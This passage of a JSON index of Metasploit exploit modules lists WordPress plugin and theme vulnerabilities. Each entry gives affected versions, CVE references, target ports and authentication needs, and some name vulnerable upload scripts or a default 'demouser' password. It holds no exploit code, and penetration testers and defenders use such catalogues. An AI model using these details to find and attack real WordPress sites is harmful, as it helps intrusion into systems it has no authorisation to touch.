"name": "Wordpress Ajax Load More PHP Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_ajax_load_more_file_upload",
"rank": 600,
"disclosure_date": "2015-10-10",
"type": "exploit",
"author": [
"Unknown",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an arbitrary file upload in the WordPress Ajax Load More\n version 2.8.1.1. It allows to upload arbitrary php files and get remote code\n execution. This module has been tested successfully on WordPress Ajax Load More\n 2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.",
"references": [
"WPVDB-8209"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Ajax Load More 2.8.1.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_ajax_load_more_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_ajax_load_more_file_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_asset_manager_upload_exec": {
"name": "WordPress Asset-Manager PHP File Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_asset_manager_upload_exec",
"rank": 600,
"disclosure_date": "2012-05-26",
"type": "exploit",
"author": [
"Sammy FORGIT",
"James Fitts <fitts.james@gmail.com>"
],
"description": "This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress\n plugin. By abusing the upload.php file, a malicious user can upload a file to a\n temp directory without authentication, which results in arbitrary code execution.",
"references": [
"OSVDB-82653",
"BID-53809",
"EDB-18993",
"URL-http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html",
"WPVDB-6106"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"asset-manager <= 2.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_asset_manager_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_creativecontactform_file_upload": {
"name": "Wordpress Creative Contact Form Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_creativecontactform_file_upload",
"rank": 600,
"disclosure_date": "2014-10-22",
"type": "exploit",
"author": [
"Gianni Angelozzi",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an arbitrary PHP code upload in the WordPress Creative Contact\n Form version 0.9.7. The vulnerability allows for arbitrary file upload and remote code execution.",
"references": [
"EDB-35057",
"OSVDB-113669",
"WPVDB-7652"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Creative Contact Form 0.9.7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_creativecontactform_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_downloadmanager_upload": {
"name": "Wordpress Download Manager (download-manager) Unauthenticated File Upload",
"full_name": "exploit/unix/webapp/wp_downloadmanager_upload",
"rank": 600,
"disclosure_date": "2014-12-03",
"type": "exploit",
"author": [
"Mickael Nadeau",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "The WordPress download-manager plugin contains multiple unauthenticated file upload\n vulnerabilities which were fixed in version 2.7.5.",
"references": [
"URL-http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html",
"WPVDB-7706"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"download-manager < 2.7.5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_downloadmanager_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_downloadmanager_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_easycart_unrestricted_file_upload": {
"name": "WordPress WP EasyCart Unrestricted File Upload",
"full_name": "exploit/unix/webapp/wp_easycart_unrestricted_file_upload",
"rank": 600,
"disclosure_date": "2015-01-08",
"type": "exploit",
"author": [
"Kacper Szurek",
"rastating"
],
"description": "WordPress Shopping Cart (WP EasyCart) Plugin for\n WordPress contains a flaw that allows a remote\n attacker to execute arbitrary PHP code. This\n flaw exists because the\n /inc/amfphp/administration/banneruploaderscript.php\n script does not properly verify or sanitize\n user-uploaded files. By uploading a .php file,\n the remote system will place the file in a\n user-accessible path. Making a direct request to\n the uploaded file will allow the attacker to\n execute the script with the privileges of the web\n server.\n\n In versions <= 3.0.8 authentication can be done by\n using the WordPress credentials of a user with any\n role. In later versions, a valid EasyCart admin\n password will be required that is in use by any\n admin user. A default installation of EasyCart will\n setup a user called \"demouser\" with a preset password\n of \"demouser\".",
"references": [
"CVE-2014-9308",
"OSVDB-116806",
"WPVDB-7745"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"wp-easycart"
],
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_easycart_unrestricted_file_upload",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_foxypress_upload": {
"name": "WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution",
"full_name": "exploit/unix/webapp/wp_foxypress_upload",
"rank": 600,
"disclosure_date": "2012-06-05",
"type": "exploit",
"author": [
"Sammy FORGIT",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits an arbitrary PHP code execution flaw in the WordPress\n blogging software plugin known as Foxypress. The vulnerability allows for arbitrary\n file upload and remote code execution via the uploadify.php script. The Foxypress\n plugin versions 0.4.1.1 to 0.4.2.1 are vulnerable.",
"references": [
"EDB-18991",
"BID-53805",
"WPVDB-6231"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Foxypress 0.4.1.1 - 0.4.2.1"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/webapp/wp_foxypress_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_foxypress_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_frontend_editor_file_upload": {
"name": "Wordpress Front-end Editor File Upload",
"full_name": "exploit/unix/webapp/wp_frontend_editor_file_upload",
"rank": 600,
"disclosure_date": "2012-07-04",
"type": "exploit",
"author": [
"Sammy",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "The WordPress Front-end Editor plugin contains an authenticated file upload\n vulnerability. An attacker can upload arbitrary files to the upload folder because\n the plugin uses its own file upload mechanism instead of the WordPress API, which\n incorrectly allows uploads of any file type.",
"references": [
"OSVDB-83637",
"WPVDB-7569",
"URL-http://www.opensyscom.fr/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Front-End Editor 2.2.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_frontend_editor_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_frontend_editor_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_google_document_embedder_exec": {
"name": "WordPress Plugin Google Document Embedder Arbitrary File Disclosure",
"full_name": "exploit/unix/webapp/wp_google_document_embedder_exec",
"rank": 300,
"disclosure_date": "2013-01-03",
"type": "exploit",
"author": [
"Charlie Eriksen"
],
"description": "This module exploits an arbitrary file disclosure flaw in the WordPress\n blogging software plugin known as Google Document Embedder. The vulnerability allows for\n database credential disclosure via the /libs/pdf.php script. The Google Document Embedder\n plug-in versions 2.4.6 and below are vulnerable. This exploit only works when the MySQL\n server is exposed on an accessible IP and WordPress has filesystem write access.\n\n Please note: The admin password may get changed if the exploit does not run to the end.",
"references": [
"CVE-2012-4915",
"OSVDB-88891",
"URL-http://secunia.com/advisories/50832",
"WPVDB-6073"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-08 10:04:47 +0000",
"path": "/modules/exploits/unix/webapp/wp_google_document_embedder_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_google_document_embedder_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_holding_pattern_file_upload": {
"name": "WordPress Holding Pattern Theme Arbitrary File Upload",
"full_name": "exploit/unix/webapp/wp_holding_pattern_file_upload",
"rank": 600,
"disclosure_date": "2015-02-11",
"type": "exploit",
"author": [
"Alexander Borg",
"rastating"
],
"description": "This module exploits a file upload vulnerability in all versions of the\n Holding Pattern theme found in the upload_file.php script which contains\n no session or file validation. It allows unauthenticated users to upload\n files of any type and subsequently execute PHP scripts in the context of\n the web server.",
"references": [
"CVE-2015-1172",
"WPVDB-7784",
"PACKETSTORM-130282"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"holding_pattern"
],
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_holding_pattern_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_inboundio_marketing_file_upload": {
"name": "Wordpress InBoundio Marketing PHP Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_inboundio_marketing_file_upload",
"rank": 600,
"disclosure_date": "2015-03-24",
"type": "exploit",
"author": [
"KedAns-Dz",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an arbitrary file upload in the WordPress InBoundio Marketing version\n 2.0. It allows to upload arbitrary php files and get remote code execution. This module\n has been tested successfully on WordPress InBoundio Marketing 2.0.3 with Wordpress 4.1.3 on\n Ubuntu 14.04 Server.",
"references": [
"EDB-36478",
"OSVDB-119890",
"WPVDB-7864"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"InBoundio Marketing 2.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_inboundio_marketing_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_inboundio_marketing_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_infusionsoft_upload": {
"name": "Wordpress InfusionSoft Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_infusionsoft_upload",
"rank": 600,
"disclosure_date": "2014-09-25",
"type": "exploit",
"author": [
"g0blin",
"us3r777 <us3r777@n0b0.so>"
],
"description": "This module exploits an arbitrary PHP code upload in the WordPress Infusionsoft Gravity\n Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file\n upload and remote code execution.",
"references": [
"CVE-2014-6446",
"URL-http://research.g0blin.co.uk/cve-2014-6446/",
"WPVDB-7634"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Infusionsoft 1.5.3 - 1.5.10"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_infusionsoft_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_infusionsoft_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_lastpost_exec": {
"name": "WordPress cache_lastpostdate Arbitrary Code Execution",
"full_name": "exploit/unix/webapp/wp_lastpost_exec",
"rank": 600,
"disclosure_date": "2005-08-09",
"type": "exploit",
"author": [
"str0ke <str0ke@milw0rm.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits an arbitrary PHP code execution flaw in the WordPress\n blogging software. This vulnerability is only present when the PHP 'register_globals'\n option is enabled (common for hosting providers). All versions of WordPress prior to\n 1.5.1.3 are affected.",
"references": [
"CVE-2005-2612",
"OSVDB-18672",
"BID-14533",
"WPVDB-6034"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_lastpost_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_lastpost_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_mobile_detector_upload_execute": {
"name": "WordPress WP Mobile Detector 3.5 Shell Upload",
"full_name": "exploit/unix/webapp/wp_mobile_detector_upload_execute",
"rank": 600,
"disclosure_date": "2016-05-31",
"type": "exploit",
"author": [
"pluginvulnerabilities.com",
"Aaditya Purani",
"h00die"
],
"description": "WP Mobile Detector Plugin for WordPress contains a flaw that allows a remote attacker\n to execute arbitrary PHP code. This flaw exists because the\n /wp-content/plugins/wp-mobile-detector/resize.php script does contains a\n remote file include for files not cached by the system already.\n By uploading a .php file, the remote system will\n place the file in a user-accessible path. Making a direct request to the\n uploaded file will allow the attacker to execute the script with the privileges\n of the web server.",
"references": [
"WPVDB-8505",
"EDB-39891",
"URL-https://www.pluginvulnerabilities.com/2016/05/31/aribitrary-file-upload-vulnerability-in-wp-mobile-detector/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"wp-mobile-detectory < 3.6"
],
"mod_time": "2017-11-01 13:32:00 +0000",
"path": "/modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_mobile_detector_upload_execute",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_nmediawebsite_file_upload": {
"name": "Wordpress N-Media Website Contact Form Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_nmediawebsite_file_upload",
"rank": 600,
"disclosure_date": "2015-04-12",
"type": "exploit",
"author": [
"Claudio Viviani",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form\n plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution.",
"references": [
"URL-http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/",
"WPVDB-7896"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"N-Media WebSite Contact Form 1.3.4"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_nmediawebsite_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_nmediawebsite_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_optimizepress_upload": {
"name": "WordPress OptimizePress Theme File Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_optimizepress_upload",
"rank": 600,
"disclosure_date": "2013-11-29",
"type": "exploit",
"author": [
"United of Muslim Cyber Army",
"Mekanismen"
],
"description": "This module exploits a vulnerability found in the WordPress theme OptimizePress. The\n vulnerability is due to an insecure file upload on the media-upload.php component, allowing\n an attacker to upload arbitrary PHP code. This module has been tested successfully on\n OptimizePress 1.45.",
"references": [
"CVE-2013-7102",
"URL-http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/",
"WPVDB-7441"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"OptimizePress"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/unix/webapp/wp_optimizepress_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_optimizepress_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_photo_gallery_unrestricted_file_upload": {
"name": "WordPress Photo Gallery Unrestricted File Upload",
"full_name": "exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload",
"rank": 600,
"disclosure_date": "2014-11-11",
"type": "exploit",
"author": [
"Kacper Szurek",
"rastating"
],
"description": "Photo Gallery Plugin for WordPress contains a flaw that allows a\n remote attacker to execute arbitrary PHP code. This flaw exists\n because the photo-gallery\\photo-gallery.php script allows access\n to filemanager\\UploadHandler.php. The post() method in UploadHandler.php\n does not properly verify or sanitize user-uploaded files.\n\n This module was tested on version 1.2.5.",
"references": [
"OSVDB-117676",
"WPVDB-7769",
"CVE-2014-9312",
"URL-http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"photo-gallery < 1.2.6"
],
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_photo_gallery_unrestricted_file_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_phpmailer_host_header": {
"name": "WordPress PHPMailer Host Header Command Injection",
"full_name": "exploit/unix/webapp/wp_phpmailer_host_header",
"rank": 200,
"disclosure_date": "2017-05-03",
"type": "exploit",
"author": [
"Dawid Golunski",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability in WordPress\n version 4.6 with Exim as an MTA via a spoofed Host header to PHPMailer,\n a mail-sending library that is bundled with WordPress.\n\n A valid WordPress username is required to exploit the vulnerability.\n Additionally, due to the altered Host header, exploitation is limited to\n the default virtual host, assuming the header isn't mangled in transit.\n\n If the target is running Apache 2.2.32 or 2.4.24 and later, the server\n may have HttpProtocolOptions set to Strict, preventing a Host header\n containing parens from passing through, making exploitation unlikely.",
"references": [
"CVE-2016-10033",
"URL-https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html",
"URL-http://www.exim.org/exim-html-current/doc/html/spec_html/ch-string_expansions.html",
"URL-https://httpd.apache.org/docs/2.4/mod/core.html#httpprotocoloptions"
],
"platform": "Linux",
"arch": "x86, x64",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WordPress 4.6 / Exim"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_phpmailer_host_header",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/wp_pixabay_images_upload": {
"name": "WordPress Pixabay Images PHP Code Upload",
"full_name": "exploit/unix/webapp/wp_pixabay_images_upload",
"rank": 600,
"disclosure_date": "2015-01-19",
"type": "exploit",
"author": [
"h0ng10"
],
"description": "This module exploits multiple vulnerabilities in the WordPress plugin Pixabay\n Images 2.3.6. The plugin does not check the host of a provided download URL\n which can be used to store and execute malicious PHP code on the system.",
"references": [
"CVE-2015-1376",
"URL-https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt",
"OSVDB-117145",
"OSVDB-117146",
"WPVDB-7758"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"pixabay-images 2.3"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_pixabay_images_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_platform_exec": {
"name": "WordPress Platform Theme File Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_platform_exec",
"rank": 600,
"disclosure_date": "2015-01-21",
"type": "exploit",
"author": [
"Marc-Alexandre Montpas",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "The WordPress Theme \"platform\" contains a remote code execution vulnerability\n through an unchecked admin_init call. The theme includes the uploaded file\n from its temp filename with php's include function.",
"references": [
"URL-http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html",
"WPVDB-7762"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"platform < 1.4.4, platform pro < 1.6.2"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/wp_platform_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_platform_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_property_upload_exec": {
"name": "WordPress WP-Property PHP File Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_property_upload_exec",
"rank": 600,
"disclosure_date": "2012-03-26",
"type": "exploit",
"author": [
"Sammy FORGIT",
"James Fitts <fitts.james@gmail.com>"
],
"description": "This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress\n plugin. By abusing the uploadify.php file, a malicious user can upload a file to a\n temp directory without authentication, which results in arbitrary code execution.",
"references": [
"OSVDB-82656",
"BID-53787",
"EDB-18987",
"URL-http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html",
"WPVDB-6225"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"wp-property <= 1.35.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/wp_property_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_property_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_reflexgallery_file_upload": {
"name": "Wordpress Reflex Gallery Upload Vulnerability",
"full_name": "exploit/unix/webapp/wp_reflexgallery_file_upload",
"rank": 600,
"disclosure_date": "2012-12-30",
"type": "exploit",
"author": [
"Unknown",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery\n version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.",
"references": [
"CVE-2015-4133",
"EDB-36374",
"OSVDB-88853",
"WPVDB-7867"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Reflex Gallery 3.1.3"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_reflexgallery_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_revslider_upload_execute": {
"name": "WordPress RevSlider File Upload and Execute Vulnerability",
"full_name": "exploit/unix/webapp/wp_revslider_upload_execute",
"rank": 600,
"disclosure_date": "2014-11-26",
"type": "exploit",
"author": [
"Simo Ben youssef",
"Tom Sellers <tom@fadedcode.net>"
],
"description": "This module exploits an arbitrary PHP code upload vulnerability in the\n WordPress ThemePunch Slider Revolution (RevSlider) plugin, versions 3.0.95\n and prior. The vulnerability allows for arbitrary file upload and remote code execution.",
"references": [
"CVE-2014-9735",
"OSVDB-115118",
"EDB-35385",
"WPVDB-7954",
"URL-https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ThemePunch Revolution Slider (revslider) 3.0.95"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_revslider_upload_execute",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_slideshowgallery_upload": {
"name": "Wordpress SlideShow Gallery Authenticated File Upload",
"full_name": "exploit/unix/webapp/wp_slideshowgallery_upload",
"rank": 600,
"disclosure_date": "2014-08-28",
"type": "exploit",
"author": [
"Jesus Ramirez Pichardo",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "The Wordpress SlideShow Gallery plugin contains an authenticated file upload\n vulnerability. An attacker can upload arbitrary files to the upload folder.\n Since the plugin uses its own file upload mechanism instead of the WordPress\n API, it's possible to upload any file type.",
"references": [
"CVE-2014-5460",
"EDB-34681",
"WPVDB-7532"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WP SlideShow Gallery 1.4.6"
],
"mod_time": "2017-12-12 00:33:28 +0000",
"path": "/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_slideshowgallery_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_symposium_shell_upload": {
"name": "WordPress WP Symposium 14.11 Shell Upload",
"full_name": "exploit/unix/webapp/wp_symposium_shell_upload",
"rank": 600,
"disclosure_date": "2014-12-11",
"type": "exploit",
"author": [
"Claudio Viviani",
"rastating"
],
"description": "WP Symposium Plugin for WordPress contains a flaw that allows a remote attacker\n to execute arbitrary PHP code. This flaw exists because the\n /wp-symposium/server/file_upload_form.php script does not properly verify or\n sanitize user-uploaded files. By uploading a .php file, the remote system will\n place the file in a user-accessible path. Making a direct request to the\n uploaded file will allow the attacker to execute the script with the privileges\n of the web server.",
"references": [
"OSVDB-116046",
"WPVDB-7716"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"wp-symposium < 14.12"
],
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/wp_symposium_shell_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/wp_total_cache_exec": {
"name": "WordPress W3 Total Cache PHP Code Execution",
"full_name": "exploit/unix/webapp/wp_total_cache_exec",
"rank": 600,
"disclosure_date": "2013-04-17",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>",
"hdm <x@hdm.io>",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module exploits a PHP Code Injection vulnerability against WordPress plugin\n W3 Total Cache for versions up to and including 0.9.2.8. WP Super Cache 1.2 or older\n is also reported as vulnerable. The vulnerability is due to the handling of certain\n macros such as mfunc, which allows arbitrary PHP code injection. A valid post ID is\n needed in order to add the malicious comment. If the POSTID option isn't specified,\n then the module will automatically find or bruteforce one. Also, if anonymous comments\n aren't allowed, then a valid username and password must be provided. In addition,\n the \"A comment is held for moderation\" option on WordPress must be unchecked for\n successful exploitation. This module has been tested against WordPress 3.5 and\n W3 Total Cache 0.9.2.3 on a Ubuntu 10.04 system.",
"references": [
"CVE-2013-2010",
"OSVDB-92652",
"BID-59316",
"URL-http://wordpress.org/support/topic/pwn3d",
"URL-http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/",
"WPVDB-6622"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
